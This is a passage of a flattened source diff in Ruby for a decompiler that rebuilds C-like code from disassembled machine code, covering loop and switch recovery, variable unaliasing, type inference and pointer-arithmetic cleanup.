C::Block.new(scope) - wb.statements = decompile_cseq_while(ary[ary.index(s)...ary.index(g)], wb) - w = C::While.new(C::CExpression[1], wb) - ary[ary.index(s)..ary.index(g)] = [w] - finished = false ; break #retry - end - if g = ary[ary.index(s)..-1].reverse.find { |_s| _s.kind_of? C::If and not _s.belse and gt = _s.bthen and - (gt = gt.kind_of?(C::Block) && gt.statements.length == 1 ? gt.statements.first : gt) and gt.kind_of? C::Goto and gt.target == s.name } - wb = C::Block.new(scope) - wb.statements = decompile_cseq_while(ary[ary.index(s)...ary.index(g)], wb) - w = C::DoWhile.new(g.test, wb) - ary[ary.index(s)..ary.index(g)] = [w] - finished = false ; break #retry - end - when C::If - decompile_cseq_while(s.bthen.statements, s.bthen) if s.bthen.kind_of? C::Block - decompile_cseq_while(s.belse.statements, s.belse) if s.belse.kind_of? C::Block - when C::While, C::DoWhile - decompile_cseq_while(s.body.statements, s.body) if s.body.kind_of? C::Block - end - } - end - ary - end - - # TODO - def decompile_cseq_switch(scope) - uncast = lambda { |e| e = e.rexpr while e.kind_of? C::CExpression and not e.op ; e } - walk(scope) { |s| - # XXX pfff... - next if not s.kind_of? C::If - # if (v < 12) return ((void(*)())(tableaddr+4*v))(); - t = s.bthen - t = t.statements.first if t.kind_of? C::Block and t.statements.length == 1 - next if not t.kind_of? C::Return or not t.respond_to? :from_instr - next if t.from_instr.comment.to_a.include? 'switch' - next if not t.value.kind_of? C::CExpression or t.value.op != :funcall or t.value.rexpr != [] or not t.value.lexpr.kind_of? C::CExpression or t.value.lexpr.op - p = uncast[t.value.lexpr.rexpr] - next if not p.kind_of? C::CExpression or p.op != :* or p.lexpr - p = uncast[p.rexpr] - next if not p.kind_of? C::CExpression or p.op != :+ - r, l = uncast[p.rexpr], uncast[p.lexpr] - r, l = l, r if r.kind_of? C::CExpression - next if not r.kind_of? ::Integer or not l.kind_of? C::CExpression or l.op != :* or not l.lexpr - lr, ll = uncast[l.rexpr], uncast[l.lexpr] - lr, ll = ll, lr if not ll.kind_of? ::Integer - next if ll != sizeof(nil, C::Pointer.new(C::BaseType.new(:void))) - base, index = r, lr - if s.test.kind_of? C::CExpression and (s.test.op == :<= or s.test.op == :<) and s.test.lexpr == index and - s.test.rexpr.kind_of? C::CExpression and not s.test.rexpr.op and s.test.rexpr.rexpr.kind_of? ::Integer - t.from_instr.add_comment 'switch' - sup = s.test.rexpr.rexpr - rng = ((s.test.op == :<) ? (0...sup) : (0..sup)) - from = t.from_instr.address - rng.map { |i| @dasm.backtrace(Indirection[base+ll*i, ll, from], from, :type => :x, :origin => from, :maxdepth => 0) } - @dasm.disassemble - throw :restart, :restart - end - puts "unhandled switch() at #{t.from_instr}" if $VERBOSE - } - end - - # remove unused labels - def remove_labels(scope) - return if forbid_optimize_labels - - used = [] - walk(scope) { |ss| - used |= [ss.target] if ss.kind_of? C::Goto - } - walk(scope) { |s| - next if not s.kind_of? C::Block - s.statements.delete_if { |l| - l.kind_of? C::Label and not used.include? l.name - } - } - - # remove implicit continue; at end of loop - walk(scope) { |s| - next if not s.kind_of? C::While - if s.body.kind_of? C::Block and s.body.statements.last.kind_of? C::Continue - s.body.statements.pop - end - } - end - - # checks if expr is a var (var or *&var) - def isvar(ce, var) - if var.stackoff and ce.kind_of? C::CExpression - return unless ce.op == :* and not ce.lexpr - ce = ce.rexpr - ce = ce.rexpr while ce.kind_of? C::CExpression and not ce.op - return unless ce.kind_of? C::CExpression and ce.op == :& and not ce.lexpr - ce = ce.rexpr - end - ce == var - end - - # checks if expr reads var - def ce_read(ce_, var) - isvar(ce_, var) or - walk_ce(ce_) { |ce| - case ce.op - when :funcall; break true if isvar(ce.lexpr, var) or ce.rexpr.find { |a| isvar(a, var) } - when :'='; break true if isvar(ce.rexpr, var) - break ce_read(ce.rexpr, var) if isvar(ce.lexpr, var) # *&var = 2 - else break true if isvar(ce.lexpr, var) or isvar(ce.rexpr, var) - end - } - end - - # checks if expr writes var - def ce_write(ce_, var) - walk_ce(ce_) { |ce| - break true if AssignOp.include?(ce.op) and (isvar(ce.lexpr, var) or - (((ce.op == :'++' or ce.op == :'--') and isvar(ce.rexpr, var)))) - } - end - - # patches a set of exprs, replacing oldce by newce - def ce_patch(exprs, oldce, newce) - walk_ce(exprs) { |ce| - case ce.op - when :funcall - ce.lexpr = newce if ce.lexpr == oldce - ce.rexpr.each_with_index { |a, i| ce.rexpr[i] = newce if a == oldce } - else - ce.lexpr = newce if ce.lexpr == oldce - ce.rexpr = newce if ce.rexpr == oldce - end - } - end - - - # duplicate vars per domain value - # eg eax = 1; foo(eax); eax = 2; bar(eax); => eax = 1; foo(eax) eax_1 = 2; bar(eax_1); - # eax = 1; if (bla) eax = 2; foo(eax); => no change - def unalias_vars(scope, func) - g = c_to_graph(scope) - - # unalias func args first, they may include __attr__((out)) needed by the others - funcalls = [] - walk_ce(scope) { |ce| funcalls << ce if ce.op == :funcall } - vars = scope.symbol.values.sort_by { |v| walk_ce(funcalls) { |ce| break true if ce.rexpr == v } ? 0 : 1 } - - # find the domains of var aliases - vars.each { |var| unalias_var(var, scope, g) } - end - - # duplicates a var per domain value - def unalias_var(var, scope, g = c_to_graph(scope)) - # [label, index] of references to var (reading it, writing it, ro/wo it (eg eax = *eax => eax_0 = *eax_1)) - read = {} - write = {} - ro = {} - wo = {} - - # list of [l, i] for which domain is not known - unchecked = [] - - # mark all exprs of the graph - # TODO handle var_14 __attribute__((out)) = &curvar <=> curvar write - r = var.has_attribute_var('register') - g.exprs.each { |label, exprs| - exprs.each_with_index { |ce, i| - if ce_read(ce, var) - if (ce.op == :'=' and isvar(ce.lexpr, var) and not ce_write(ce.rexpr, var)) or - (ce.op == :funcall and r and not ce_write(ce.lexpr, var) and not ce_write(ce.rexpr, var) and @dasm.cpu.abi_funcall[:changed].include?(r.to_sym)) - (ro[label] ||= []) << i - (wo[label] ||= []) << i - unchecked << [label, i, :up] << [label, i, :down] - else - (read[label] ||= []) << i - unchecked << [label, i] - end - elsif ce_write(ce, var) - (write[label] ||= []) << i - unchecked << [label, i] - end - } - } - - # stuff when filling the domain (flood algorithm) - dom = dom_ro = dom_wo = todo_up = todo_down = func_top = nil - - # flood by walking the graph up from [l, i] (excluded) - # marks stuff do walk down - walk_up = lambda { |l, i| - todo_w = [[l, i-1]] - done_w = [] - while o = todo_w.pop - next if done_w.include? o - done_w << o - l, i = o - loop do - if read[l].to_a.include? i - # XXX not optimal (should mark only the uppest read) - todo_down |= [[l, i]] if not dom.include? [l, i] - dom |= [[l, i]] - elsif write[l].to_a.include? i - todo_down |= [[l, i]] if not dom.include? [l, i] - dom |= [[l, i]] - break - elsif wo[l].to_a.include? i - todo_down |= [[l, i]] if not dom_wo.include? [l, i, :down] - dom_wo |= [[l, i, :down]] - break - end - i -= 1 - if i < 0 - g.from_optim[l].to_a.each { |ll| - todo_w << [ll, g.exprs[ll].to_a.length-1] - } - func_top = true if g.from_optim[l].to_a.empty? - break - end - end - end - } - - # flood by walking the graph down from [l, i] (excluded) - # malks stuff to walk up - walk_down = lambda { |l, i| - todo_w = [[l, i+1]] - done_w = [] - while o = todo_w.pop - next if done_w.include? o - done_w << o - l, i = o - loop do - if read[l].to_a.include? i - todo_up |= [[l, i]] if not dom.include? [l, i] - dom |= [[l, i]] - elsif write[l].to_a.include? i - break - elsif ro[l].to_a.include? i - todo_up |= [[l, i]] if not dom_ro.include? [l, i, :up] - dom_ro |= [[l, i, :up]] - break - end - i += 1 - if i >= g.exprs[l].to_a.length - g.to_optim[l].to_a.each { |ll| - todo_w << [ll, 0] - } - break - end - end - end - } - - # check it out - while o = unchecked.shift - dom = [] - dom_ro = [] - dom_wo = [] - func_top = false - - todo_up = [] - todo_down = [] - - # init - if read[o[0]].to_a.include? o[1] - todo_up << o - todo_down << o - dom << o - elsif write[o[0]].to_a.include? o[1] - todo_down << o - dom << o - elsif o[2] == :up - todo_up << o - dom_ro << o - elsif o[2] == :down - todo_down << o - dom_wo << o - else raise - end - - # loop - while todo_up.first or todo_down.first - todo_up.each { |oo| walk_up[oo[0], oo[1]] } - todo_up.clear - - todo_down.each { |oo| walk_down[oo[0], oo[1]] } - todo_down.clear - end - - unchecked -= dom + dom_wo + dom_ro - - next if func_top - - # patch - n_i = 0 - n_i += 1 while scope.symbol_ancestors[newvarname = "#{var.name}_a#{n_i}"] - - nv = var.dup - nv.storage = :register if nv.has_attribute_var('register') - nv.attributes = nv.attributes.dup if nv.attributes - nv.name = newvarname - scope.statements << C::Declaration.new(nv) - scope.symbol[nv.name] = nv - - dom.each { |oo| ce_patch(g.exprs[oo[0]][oo[1]], var, nv) } - dom_ro.each { |oo| - ce = g.exprs[oo[0]][oo[1]] - if ce.op == :funcall or ce.rexpr.kind_of? C::CExpression - ce_patch(ce.rexpr, var, nv) - else - ce.rexpr = nv - end - } - dom_wo.each { |oo| - ce = g.exprs[oo[0]][oo[1]] - if ce.op == :funcall - elsif ce.lexpr.kind_of? C::CExpression - ce_patch(ce.lexpr, var, nv) - else - ce.lexpr = nv - end - } - - # check if the var is only used as an __out__ parameter - if false and dom_ro.empty? and dom_wo.empty? and dom.length == 2 and # TODO - arg.has_attribute('out') and not arg.has_attribute('in') - # *(int32*)&var_10 = &var_4; - # set_pointed_value(*(int32*)&var_10); => writeonly var_4, may start a new domain - nv.add_attribute('out') - end - end - end - - # revert the unaliasing namechange of vars where no alias subsists - def simplify_varname_noalias(scope) - names = scope.symbol.keys - names.delete_if { |k| - next if not b = k[/^(.*)_a\d+$/, 1] - next if scope.symbol[k].stackoff.to_i > 0 - if not names.find { |n| n != k and (n == b or n[/^(.*)_a\d+$/, 1] == b) } - scope.symbol[b] = scope.symbol.delete(k) - scope.symbol[b].name = b - end - } - end - - # patch scope to transform :frameoff-x into &var_x - def namestackvars(scope) - off2var = {} - newvar = lambda { |o, n| - if not v = off2var[o] - v = off2var[o] = C::Variable.new - v.type = C::BaseType.new(:void) - v.name = n - v.stackoff = o - scope.symbol[v.name] = v - scope.statements << C::Declaration.new(v) - end - v - } - - scope.decompdata[:stackoff_name].each { |o, n| newvar[o, n] } - scope.decompdata[:stackoff_type].each { |o, t| newvar[o, stackoff_to_varname(o)] } - - walk_ce(scope) { |e| - next if e.op != :+ and e.op != :- - next if not e.lexpr.kind_of? C::Variable or e.lexpr.name != 'frameptr' - next if not e.rexpr.kind_of? C::CExpression or e.rexpr.op or not e.rexpr.rexpr.kind_of? ::Integer - off = e.rexpr.rexpr - off = -off if e.op == :- - v = newvar[off, stackoff_to_varname(off)] - e.replace C::CExpression[:&, v] - } - end - - # assign type to vars (regs, stack & global) - # types are found by subfunction argument types & indirections, and propagated through assignments etc - # TODO when updating the type of a var, update the type of all cexprs where it appears - def decompile_c_types(scope) - return if forbid_decompile_types - - # TODO *(int8*)(ptr+8); *(int32*)(ptr+12) => automatic struct - - # name => type - types = {} - - pscopevar = lambda { |e| - e = e.rexpr while e.kind_of? C::CExpression and not e.op and e.rexpr.kind_of? C::CExpression - if e.kind_of? C::CExpression and e.op == :& and not e.lexpr and e.rexpr.kind_of? C::Variable - e.rexpr.name if scope.symbol[e.rexpr.name] - end - } - scopevar = lambda { |e| - e = e.rexpr if e.kind_of? C::CExpression and not e.op - if e.kind_of? C::Variable and scope.symbol[e.name] - e.name - elsif e.kind_of? C::CExpression and e.op == :* and not e.lexpr - pscopevar[e.rexpr] - end - } - globalvar = lambda { |e| - e = e.rexpr if e.kind_of? C::CExpression and not e.op - if e.kind_of? ::Integer and @dasm.get_section_at(e) - e - elsif e.kind_of? C::Variable and not scope.symbol[e.name] and @c_parser.toplevel.symbol[e.name] and @dasm.get_section_at(e.name) - e.name - end - } - - # check if a newly found type for o is better than current type - # order: foo* > void* > foo - better_type = lambda { |t0, t1| - t1 == C::BaseType.new(:void) or (t0.pointer? and t1.kind_of? C::BaseType) or t0.untypedef.kind_of? C::Union or - (t0.kind_of? C::BaseType and t1.kind_of? C::BaseType and (@c_parser.typesize[t0.name] > @c_parser.typesize[t1.name] or (t0.name == t1.name and t0.qualifier))) or - (t0.pointer? and t1.pointer? and better_type[t0.pointed, t1.pointed]) - } - - update_global_type = lambda { |e, t| - if ne = new_global_var(e, t, scope) - ne.type = t if better_type[t, ne.type] # TODO patch existing scopes using ne - # TODO rename (dword_xx -> byte_xx etc) - e = scope.symbol_ancestors[e] || e if e.kind_of? String # exe reloc - walk_ce(scope) { |ce| - ce.lexpr = ne if ce.lexpr == e - ce.rexpr = ne if ce.rexpr == e - if ce.op == :* and not ce.lexpr and ce.rexpr == ne and ne.type.pointer? and ne.type.pointed.untypedef.kind_of? C::Union - # *struct -> struct->bla - ce.rexpr = structoffset(ne.type.pointed.untypedef, ce.rexpr, 0, sizeof(ce.type)) - elsif ce.lexpr == ne or ce.rexpr == ne - # set ce type according to l/r - # TODO set ce.parent type etc - ce.type = C::CExpression[ce.lexpr, ce.op, ce.rexpr].type - end - } - end - } - - propagate_type = nil # fwd declaration - propagating = [] # recursion guard (x = &x) - # check if need to change the type of a var - # propagate_type if type is updated - update_type = lambda { |n, t| - next if propagating.include? n - o = scope.symbol[n].stackoff - next if not o and t.untypedef.kind_of? C::Union - next if o and scope.decompdata[:stackoff_type][o] and t != scope.decompdata[:stackoff_type][o] - next if t0 = types[n] and not better_type[t, t0] - next if o and (t.integral? or t.pointer?) and o % sizeof(t) != 0 # keep vars aligned - types[n] = t - next if t == t0 - propagating << n - propagate_type[n, t] - propagating.delete n - next if not o - t = t.untypedef - if t.kind_of? C::Struct - t.members.to_a.each { |m| - mo = t.offsetof(@c_parser, m.name) - next if mo == 0 - scope.symbol.each { |vn, vv| - update_type[vn, m.type] if vv.stackoff == o+mo - } - } - end - } - - # try to update the type of a var from knowing the type of an expr (through dereferences etc) - known_type = lambda { |e, t| - loop do - e = e.rexpr while e.kind_of? C::CExpression and not e.op and e.type == t - if o = scopevar[e] - update_type[o, t] - elsif o = globalvar[e] - update_global_type[o, t] - elsif not e.kind_of? C::CExpression - elsif o = pscopevar[e] and t.pointer? - update_type[o, t.pointed] - elsif e.op == :* and not e.lexpr - e = e.rexpr - t = C::Pointer.new(t) - next - elsif t.pointer? and e.op == :+ and e.lexpr.kind_of? C::CExpression and e.lexpr.type.integral? and e.rexpr.kind_of? C::Variable - e.lexpr, e.rexpr = e.rexpr, e.lexpr - next - elsif e.op == :+ and e.lexpr and e.rexpr.kind_of? C::CExpression - if not e.rexpr.op and e.rexpr.rexpr.kind_of? ::Integer - if t.pointer? and e.rexpr.rexpr < 0x1000 and (e.rexpr.rexpr % sizeof(t.pointed)) == 0 # XXX relocatable + base=0.. - e = e.lexpr # (int)*(x+2) === (int) *x - next - elsif globalvar[e.rexpr.rexpr] - known_type[e.lexpr, C::BaseType.new(:int)] - e = e.rexpr - next - end - elsif t.pointer? and (e.lexpr.kind_of? C::CExpression and e.lexpr.lexpr and [:<<, :>>, :*, :&].include? e.lexpr.op) or - (o = scopevar[e.lexpr] and types[o] and types[o].integral? and - !(o = scopevar[e.rexpr] and types[o] and types[o].integral?)) - e.lexpr, e.rexpr = e.rexpr, e.lexpr # swap - e = e.lexpr - next - elsif t.pointer? and ((e.rexpr.kind_of? C::CExpression and e.rexpr.lexpr and [:<<, :>>, :*, :&].include? e.rexpr.op) or - (o = scopevar[e.rexpr] and types[o] and types[o].integral? and - !(o = scopevar[e.lexpr] and types[o] and types[o].integral?))) - e = e.lexpr - next - end - end - break - end - } - - # we found a type for a var, propagate it through affectations - propagate_type = lambda { |var, type| - walk_ce(scope) { |ce| - next if ce.op != :'=' - - if ce.lexpr.kind_of? C::Variable and ce.lexpr.name == var - known_type[ce.rexpr, type] - next - end - if ce.rexpr.kind_of? C::Variable and ce.rexpr.name == var - known_type[ce.lexpr, type] - next - end - - # int **x; y = **x => int y - t = type - l = ce.lexpr - while l.kind_of? C::CExpression and l.op == :* and not l.lexpr - if var == pscopevar[l.rexpr] - known_type[ce.rexpr, t] - break - elsif t.pointer? - l = l.rexpr - t = t.pointed - else break - end - end - - # int **x; **x = y => int y - t = type - r = ce.rexpr - while r.kind_of? C::CExpression and r.op == :* and not r.lexpr - if var == pscopevar[r.rexpr] - known_type[ce.lexpr, t] - break - elsif t.pointer? - r = r.rexpr - t = t.pointed - else break - end - end - - # TODO int *x; *x = *y; ? - } - } - - # put all those macros in use - # use user-defined types first - scope.symbol.each_value { |v| - next if not v.kind_of? C::Variable or not v.stackoff or not t = scope.decompdata[:stackoff_type][v.stackoff] - known_type[v, t] - } - - # try to infer types from C semantics - later = [] - walk_ce(scope) { |ce| - if ce.op == :'=' and ce.rexpr.kind_of? C::CExpression and (ce.rexpr.op == :funcall or (ce.rexpr.op == nil and ce.rexpr.rexpr.kind_of? ::Integer and - ce.rexpr.rexpr.abs < 0x10000 and (not ce.lexpr.kind_of? C::CExpression or ce.lexpr.op != :'*' or ce.lexpr.lexpr))) - # var = int - known_type[ce.lexpr, ce.rexpr.type] - elsif ce.op == :funcall - f = ce.lexpr.type - f = f.pointed if f.pointer? - next if not f.kind_of? C::Function - # cast func args to arg prototypes - f.args.to_a.zip(ce.rexpr).each_with_index { |(proto, arg), i| ce.rexpr[i] = C::CExpression[arg, proto.type] ; known_type[arg, proto.type] } - elsif ce.op == :* and not ce.lexpr - if e = ce.rexpr and e.kind_of? C::CExpression and not e.op and e = e.rexpr and e.kind_of? C::CExpression and - e.op == :& and not e.lexpr and e.rexpr.kind_of? C::Variable and e.rexpr.stackoff - # skip *(__int32*)&var_12 for now, avoid saying var12 is an int if it may be a ptr or anything - later << [ce.rexpr, C::Pointer.new(ce.type)] - next - end - known_type[ce.rexpr, C::Pointer.new(ce.type)] - elsif not ce.op and ce.type.pointer? and ce.type.pointed.kind_of? C::Function - # cast to fptr: must be a fptr - known_type[ce.rexpr, ce.type] - end - } - - later.each { |ce, t| known_type[ce, t] } - - # offsets have types now - types.each { |v, t| - # keep var type qualifiers - q = scope.symbol[v].type.qualifier - scope.symbol[v].type = t - t.qualifier = q if q - } - - - # remove offsets to struct members - # XXX this defeats antialiasing - # off => [structoff, membername, membertype] - memb = {} - types.dup.each { |n, t| - v = scope.symbol[n] - next if not o = v.stackoff - t = t.untypedef - if t.kind_of? C::Struct - t.members.to_a.each { |tm| - moff = t.offsetof(@c_parser, tm.name) - next if moff == 0 - types.delete_if { |vv, tt| scope.symbol[vv].stackoff == o+moff } - memb[o+moff] = [v, tm.name, tm.type] - } - end - } - - # patch local variables into the CExprs, incl unknown offsets - varat = lambda { |n| - v = scope.symbol[n] - if s = memb[v.stackoff] - v = C::CExpression[s[0], :'.', s[1], s[2]] - else - v.type = types[n] || C::BaseType.new(:int) - end - v - } - - maycast = lambda { |v, e| - if sizeof(v) != sizeof(e) - v = C::CExpression[:*, [[:&, v], C::Pointer.new(e.type)]] - end - v - } - maycast_p = lambda { |v, e| - if not e.type.pointer? or sizeof(v) != sizeof(nil, e.type.pointed) - C::CExpression[[:&, v], e.type] - else - C::CExpression[:&, v] - end - } - - walk_ce(scope, true) { |ce| - case - when ce.op == :funcall - ce.rexpr.map! { |re| - if o = scopevar[re]; C::CExpression[maycast[varat[o], re]] - elsif o = pscopevar[re]; C::CExpression[maycast_p[varat[o], re]] - else re - end - } - when o = scopevar[ce.lexpr]; ce.lexpr = maycast[varat[o], ce.lexpr] - when o = scopevar[ce.rexpr]; ce.rexpr = maycast[varat[o], ce.rexpr] - ce.rexpr = C::CExpression[ce.rexpr] if not ce.op and ce.rexpr.kind_of? C::Variable - when o = pscopevar[ce.lexpr]; ce.lexpr = maycast_p[varat[o], ce.lexpr] - when o = pscopevar[ce.rexpr]; ce.rexpr = maycast_p[varat[o], ce.rexpr] - when o = scopevar[ce]; ce.replace C::CExpression[maycast[varat[o], ce]] - when o = pscopevar[ce]; ce.replace C::CExpression[maycast_p[varat[o], ce]] - end - } - - fix_type_overlap(scope) - fix_pointer_arithmetic(scope) - - # if int32 var_4 is always var_4 & 255, change type to int8 - varuse = Hash.new(0) - varandff = Hash.new(0) - varandffff = Hash.new(0) - walk_ce(scope) { |ce| - if ce.op == :& and ce.lexpr.kind_of? C::Variable and ce.lexpr.type.integral? and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer - case ce.rexpr.rexpr - when 0xff; varandff[ce.lexpr.name] += 1 - when 0xffff; varandffff[ce.lexpr.name] += 1 - end - end - varuse[ce.lexpr.name] += 1 if ce.lexpr.kind_of? C::Variable - varuse[ce.rexpr.name] += 1 if ce.rexpr.kind_of? C::Variable - } - varandff.each { |k, v| - scope.symbol[k].type = C::BaseType.new(:__int8, :unsigned) if varuse[k] == v - } - varandffff.each { |k, v| - scope.symbol[k].type = C::BaseType.new(:__int16, :unsigned) if varuse[k] == v - } - - # propagate types to cexprs - walk_ce(scope, true) { |ce| - if ce.op - ce.type = C::CExpression[ce.lexpr, ce.op, ce.rexpr].type rescue next - if ce.op == :'=' and ce.rexpr.kind_of? C::Typed and ce.rexpr.type != ce.type and (not ce.rexpr.type.integral? or not ce.type.integral?) - known_type[ce.rexpr, ce.type] if ce.type.pointer? and ce.type.pointed.untypedef.kind_of? C::Function # localvar = &struct with fptr - ce.rexpr = C::CExpression[[ce.rexpr], ce.type] - end - elsif ce.type.pointer? and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :& and not ce.rexpr.lexpr and sizeof(ce.rexpr.rexpr.type) == sizeof(ce.type.pointed) - ce.type = ce.rexpr.type - end - } - end - - # struct foo { int i; int j; struct { int k; int l; } m; }; bla+12 => &bla->m.l - # st is a struct, ptr is an expr pointing to a struct, off is a numeric offset from ptr, msz is the size of the pointed member (nil ignored) - def structoffset(st, ptr, off, msz) - tabidx = off / sizeof(st) - off -= tabidx * sizeof(st) - ptr = C::CExpression[:&, [ptr, :'[]', [tabidx]]] if tabidx != 0 or ptr.type.untypedef.kind_of? C::Array - return ptr if off == 0 and (not msz or # avoid infinite recursion with eg chained list - (ptr.kind_of? C::CExpression and ((ptr.op == :& and not ptr.lexpr and s=ptr.rexpr) or (ptr.op == :'.' and s=ptr)) and - not s.type.untypedef.kind_of? C::Union)) - - m_ptr = lambda { |m| - if ptr.kind_of? C::CExpression and ptr.op == :& and not ptr.lexpr - C::CExpression[ptr.rexpr, :'.', m.name] - else - C::CExpression[ptr, :'->', m.name] - end - } - - # recursive proc to list all named members, including in anonymous substructs - submemb = lambda { |sm| sm.name ? sm : sm.type.kind_of?(C::Union) ? sm.type.members.to_a.map { |ssm| submemb[ssm] } : nil } - mbs = st.members.to_a.map { |m| submemb[m] }.flatten.compact - mo = mbs.inject({}) { |h, m| h.update m => st.offsetof(@c_parser, m.name) } - - if sm = mbs.find { |m| mo[m] == off and (not msz or sizeof(m) == msz) } || - mbs.find { |m| mo[m] <= off and mo[m]+sizeof(m) > off } - off -= mo[sm] - sst = sm.type.untypedef - #return ptr if mo[sm] == 0 and sst.pointer? and sst.type.untypedef == st # TODO fix infinite recursion on mutually recursive ptrs - ptr = C::CExpression[:&, m_ptr[sm]] - if sst.kind_of? C::Union - return structoffset(sst, ptr, off, msz) - end - end - - if off != 0 - C::CExpression[[[ptr], C::Pointer.new(C::BaseType.new(:__int8))], :+, [off]] - else - ptr - end - end - - # fix pointer arithmetic (eg int foo += 4 => int* foo += 1) - # use struct member access (eg *(structptr+8) => structptr->bla) - # must be run only once, right after type setting - def fix_pointer_arithmetic(scope) - walk_ce(scope, true) { |ce| - if ce.lexpr and ce.lexpr.type.pointer? and [:&, :>>, :<<].include? ce.op - ce.lexpr = C::CExpression[[ce.lexpr], C::BaseType.new(:int)] - end - - if ce.op == :+ and ce.lexpr and ((ce.lexpr.type.integral? and ce.rexpr.type.pointer?) or (ce.rexpr.type.pointer? and ce.rexpr.type.pointed.untypedef.kind_of? C::Union)) - ce.rexpr, ce.lexpr = ce.lexpr, ce.rexpr - end - - if ce.op == :* and not ce.lexpr and ce.rexpr.type.pointer? and ce.rexpr.type.pointed.untypedef.kind_of? C::Struct - s = ce.rexpr.type.pointed.untypedef - m = s.members.to_a.find { |m_| s.offsetof(@c_parser, m_.name) == 0 } - if sizeof(m) != sizeof(ce) - ce.rexpr = C::CExpression[[ce.rexpr, C::Pointer.new(s)], C::Pointer.new(ce.type)] - next - end - # *structptr => structptr->member - ce.lexpr = ce.rexpr - ce.op = :'->' - ce.rexpr = m.name - ce.type = m.type - next - elsif ce.op == :'=' and ce.lexpr.type.untypedef.kind_of? C::Struct - s = ce.lexpr.type.untypedef - m = s.members.to_a.find { |m_| s.offsetof(@c_parser, m_.name) == 0 } - ce.lexpr = C::CExpression.new(ce.lexpr, :'.', m.name, m.type) - ce.type = m.type - next - end - - if ce.op == :+ and ce.lexpr and ce.lexpr.type.pointer? and not ce.type.pointer? - ce.type = ce.lexpr.type - end - - if ce.op == :& and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :* and not ce.rexpr.lexpr - ce.replace C::CExpression[ce.rexpr.rexpr] - end - - next if not ce.lexpr or not ce.lexpr.type.pointer? - if ce.op == :+ and (s = ce.lexpr.type.pointed.untypedef).kind_of? C::Union and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and - ce.rexpr.rexpr.kind_of? ::Integer and o = ce.rexpr.rexpr - # structptr + 4 => &structptr->member - ce.replace structoffset(s, ce.lexpr, o, nil) - elsif [:+, :-, :'+=', :'-='].include? ce.op and ce.rexpr.kind_of? C::CExpression and ((not ce.rexpr.op and i = ce.rexpr.rexpr) or - (ce.rexpr.op == :* and i = ce.rexpr.lexpr and ((i.kind_of? C::CExpression and not i.op and i = i.rexpr) or true))) and - i.kind_of? ::Integer and psz = sizeof(nil, ce.lexpr.type.pointed) and i % psz == 0 - # ptr += 4 => ptr += 1 - if not ce.rexpr.op - ce.rexpr.rexpr /= psz - else - ce.rexpr.lexpr.rexpr /= psz - if ce.rexpr.lexpr.rexpr == 1 - ce.rexpr = ce.rexpr.rexpr - end - end - ce.type = ce.lexpr.type - - elsif (ce.op == :+ or ce.op == :-) and sizeof(nil, ce.lexpr.type.pointed) != 1 - # ptr+x => (ptrtype*)(((__int8*)ptr)+x) - # XXX create struct ? - ce.rexpr = C::CExpression[ce.rexpr, C::BaseType.new(:int)] if not ce.rexpr.type.integral? - if sizeof(nil, ce.lexpr.type.pointed) != 1 - ptype = ce.lexpr.type - p = C::CExpression[[ce.lexpr], C::Pointer.new(C::BaseType.new(:__int8))] - ce.replace C::CExpression[[p, ce.op, ce.rexpr, p.type], ptype] - end - end - } - end - - # handling of var overlapping (eg __int32 var_10; __int8 var_F => replace all var_F by *(&var_10 + 1)) - # must be done before fix_pointer_arithmetic - def fix_type_overlap(scope) - varinfo = {} - scope.symbol.each_value { |var| - next if not off = var.stackoff - len = sizeof(var) - varinfo[var] = [off, len] - } - - varinfo.each { |v1, (o1, l1)| - next if not v1.type.integral? - varinfo.each { |v2, (o2, l2)| - # XXX o1 may overlap o2 AND another (int32 v_10; int32 v_E; int32 v_C;) - # TODO should check stuff with aliasing domains - next if v1.name == v2.name or o1 >= o2+l2 or o1+l1 <= o2 or l1 > l2 or (l2 == l1 and o2 >= o1) - # v1 => *(&v2+delta) - p = C::CExpression[:&, v2] - p = C::CExpression[p, :+, [o1-o2]] - p = C::CExpression[p, C::Pointer.new(v1.type)] if v1.type != p.type.type - p = C::CExpression[:*, p] - walk_ce(scope) { |ce| - ce.lexpr = p if ce.lexpr == v1 - ce.rexpr = p if ce.rexpr == v1 - } - } - - } - end - - # to be run with scope = function body with only CExpr/Decl/Label/Goto/IfGoto/Return, with correct variables types - # will transform += 1 to ++, inline them to prev/next statement ('++x; if (x)..' => 'if (++x)..') + ce.bthen.outer.statements[i] = ce.test # TODO remove sideeffectless parts + end + end + end + if ce.belse.kind_of? C::Block and ce.belse.statements.length == 1 + walk(ce.belse.statements) { |sst| sst.outer = ce.belse.outer if sst.kind_of? C::Block and sst.outer == ce.belse } + ce.belse = ce.belse.statements.first + end + when C::While, C::DoWhile + patch_test[ce.test] + if ce.body.kind_of? C::Block + case ce.body.statements.length + when 1 + walk(ce.body.statements) { |sst| sst.outer = ce.body.outer if sst.kind_of? C::Block and sst.outer == ce.body } + ce.body = ce.body.statements.first + when 0 + if ce.kind_of? C::DoWhile and i = ce.body.outer.statements.index(ce) + ce = ce.body.outer.statements[i] = C::While.new(ce.test, ce.body) + end + ce.body = nil + end + end + end + } + walk(scope) { |ce| + next if not ce.kind_of? C::Block + st = ce.statements + st.length.times { |n| + while st[n].kind_of? C::If and st[n+1].kind_of? C::If and not st[n].belse and not st[n+1].belse and ( + (st[n].bthen.kind_of? C::Return and st[n+1].bthen.kind_of? C::Return and st[n].bthen.value == st[n+1].bthen.value) or + (st[n].bthen.kind_of? C::Break and st[n+1].bthen.kind_of? C::Break) or + (st[n].bthen.kind_of? C::Continue and st[n+1].bthen.kind_of? C::Continue)) + # if (a) return x; if (b) return x; => if (a || b) return x; + st[n].test = C::CExpression[st[n].test, :'||', st[n+1].test] + st.delete_at(n+1) + end + } + } + end + + # ifgoto => ifthen + # ary is an array of statements where we try to find if () {} [else {}] + # recurses to then/else content + def decompile_cseq_if(ary, scope) + return ary if forbid_decompile_ifwhile + # the array of decompiled statements to use as replacement + ret = [] + # list of labels appearing in ary + inner_labels = ary.grep(C::Label).map { |l| l.name } + while s = ary.shift + # recurse if it's not the first run + if s.kind_of? C::If + s.bthen.statements = decompile_cseq_if(s.bthen.statements, s.bthen) if s.bthen.kind_of? C::Block + s.belse.statements = decompile_cseq_if(s.belse.statements, s.belse) if s.belse.kind_of? C::Block + end + + # if (a) goto x; if (b) goto x; => if (a || b) goto x; + while s.kind_of? C::If and s.bthen.kind_of? C::Goto and not s.belse and 